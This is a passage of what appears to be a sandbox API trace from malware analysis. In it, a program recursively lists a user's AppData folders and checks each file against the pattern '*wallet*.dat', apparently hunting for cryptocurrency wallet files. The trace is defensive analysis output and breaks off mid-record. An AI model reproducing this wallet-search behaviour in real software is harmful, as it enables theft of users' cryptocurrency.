param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0234.706] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0234.706] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 52 [0234.706] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0234.706] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*") returned 92 [0234.706] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x3d053a9f, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d053a9f, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x9ee78381, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x94, nFileSizeLow=0x196dc8, dwReserved0=0x1, dwReserved1=0x650064, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0234.706] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6654de95, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6657eabb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0234.706] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2=".") returned 31 [0234.706] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2="..") returned 31 [0234.706] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0234.706] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0234.707] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 62 [0234.707] PathMatchSpecA (pszFile="Microsoft Outlook.lnk", pszSpec="*wallet*.dat") returned 0 [0234.707] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*") returned 102 [0234.707] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x6654de95, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x6654de95, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x6657eabb, ftLastWriteTime.dwLowDateTime=0x1d70699, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x51b, nFileSizeLow=0x196dc8, dwReserved0=0x1, dwReserved1=0x69004d, cFileName="c", cAlternateFileName="C")) returned 0xffffffff [0234.707] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0234.707] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2=".") returned 37 [0234.707] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2="..") returned 37 [0234.707] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0234.707] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0234.707] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 58 [0234.707] PathMatchSpecA (pszFile="Shows Desktop.lnk", pszSpec="*wallet*.dat") returned 0 [0234.707] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*") returned 98 [0234.707] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x3d053a9f, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d053a9f, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x251fff9e, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x160, nFileSizeLow=0x196dc8, dwReserved0=0x1, dwReserved1=0x680053, cFileName="o", cAlternateFileName="C")) returned 0xffffffff [0234.707] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0234.708] StrCmpCA (pszStr1="User Pinned", pszStr2=".") returned 39 [0234.708] StrCmpCA (pszStr1="User Pinned", pszStr2="..") returned 39 [0234.708] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 90 [0234.708] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0234.708] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 52 [0234.708] PathMatchSpecA (pszFile="User Pinned", pszSpec="*wallet*.dat") returned 0 [0234.708] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 92 [0234.708] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1920 [0234.708] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.708] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.708] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.708] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.708] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0234.709] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2=".") returned 27 [0234.709] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2="..") returned 27 [0234.709] wsprintfA (in: param_1=0x196834, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 111 [0234.709] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0234.709] wsprintfA (in: param_1=0x19693c, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 73 [0234.709] PathMatchSpecA (pszFile="ImplicitAppShortcuts", pszSpec="*wallet*.dat") returned 0 [0234.709] wsprintfA (in: param_1=0x196504, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 113 [0234.709] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1720 [0234.709] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.709] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.710] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.710] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.710] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0234.710] FindClose (in: hFindFile=0x6e1720 | out: hFindFile=0x6e1720) returned 1 [0234.710] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0234.710] StrCmpCA (pszStr1="TaskBar", pszStr2=".") returned 38 [0234.710] StrCmpCA (pszStr1="TaskBar", pszStr2="..") returned 38 [0234.710] wsprintfA (in: param_1=0x196834, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 98 [0234.710] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0234.710] wsprintfA (in: param_1=0x19693c, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 60 [0234.710] PathMatchSpecA (pszFile="TaskBar", pszSpec="*wallet*.dat") returned 0 [0234.710] wsprintfA (in: param_1=0x196504, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 100 [0234.711] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1d60 [0234.711] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.711] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.711] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.711] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.711] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0234.711] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0234.711] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0234.711] wsprintfA (in: param_1=0x1961ac, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0234.711] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0234.711] wsprintfA (in: param_1=0x1962b4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 72 [0234.712] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0234.712] wsprintfA (in: param_1=0x195e7c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*") returned 112 [0234.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0xad164063, ftCreationTime.dwLowDateTime=0x1d7006b, ftCreationTime.dwHighDateTime=0xad164063, ftLastAccessTime.dwLowDateTime=0x1d7006b, ftLastAccessTime.dwHighDateTime=0xad18a23e, ftLastWriteTime.dwLowDateTime=0x1d7006b, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x53, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0234.712] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0234.712] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2=".") returned 24 [0234.712] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2="..") returned 24 [0234.712] wsprintfA (in: param_1=0x1961ac, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0234.712] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0234.712] wsprintfA (in: param_1=0x1962b4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 78 [0234.713] PathMatchSpecA (pszFile="File Explorer.lnk", pszSpec="*wallet*.dat") returned 0 [0234.713] wsprintfA (in: param_1=0x195e7c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*") returned 118 [0234.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0xad164063, ftCreationTime.dwLowDateTime=0x1d7006b, ftCreationTime.dwHighDateTime=0xad164063, ftLastAccessTime.dwLowDateTime=0x1d7006b, ftLastAccessTime.dwHighDateTime=0x252988fc, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x197, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x690046, cFileName="l", cAlternateFileName="C")) returned 0xffffffff [0234.713] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0234.714] FindClose (in: hFindFile=0x6e1d60 | out: hFindFile=0x6e1d60) returned 1 [0234.714] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0234.714] FindClose (in: hFindFile=0x6e1920 | out: hFindFile=0x6e1920) returned 1 [0234.714] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0234.714] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2=".") returned 41 [0234.714] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2="..") returned 41 [0234.714] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0234.714] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0234.714] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 60 [0234.714] PathMatchSpecA (pszFile="Window Switcher.lnk", pszSpec="*wallet*.dat") returned 0 [0234.715] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*") returned 100 [0234.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x3d02d92b, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d02d92b, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x252261fd, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x14e, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x690057, cFileName="n", cAlternateFileName="")) returned 0xffffffff [0234.715] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0234.715] FindClose (in: hFindFile=0x6e1aa0 | out: hFindFile=0x6e1aa0) returned 1 [0234.715] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14e, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0234.715] StrCmpCA (pszStr1="UserData", pszStr2=".") returned 39 [0234.715] StrCmpCA (pszStr1="UserData", pszStr2="..") returned 39 [0234.715] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 74 [0234.715] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0234.715] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData") returned 36 [0234.715] PathMatchSpecA (pszFile="UserData", pszSpec="*wallet*.dat") returned 0 [0234.715] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned 76 [0234.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e17a0 [0234.716] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.716] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.716] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.716] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.716] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, 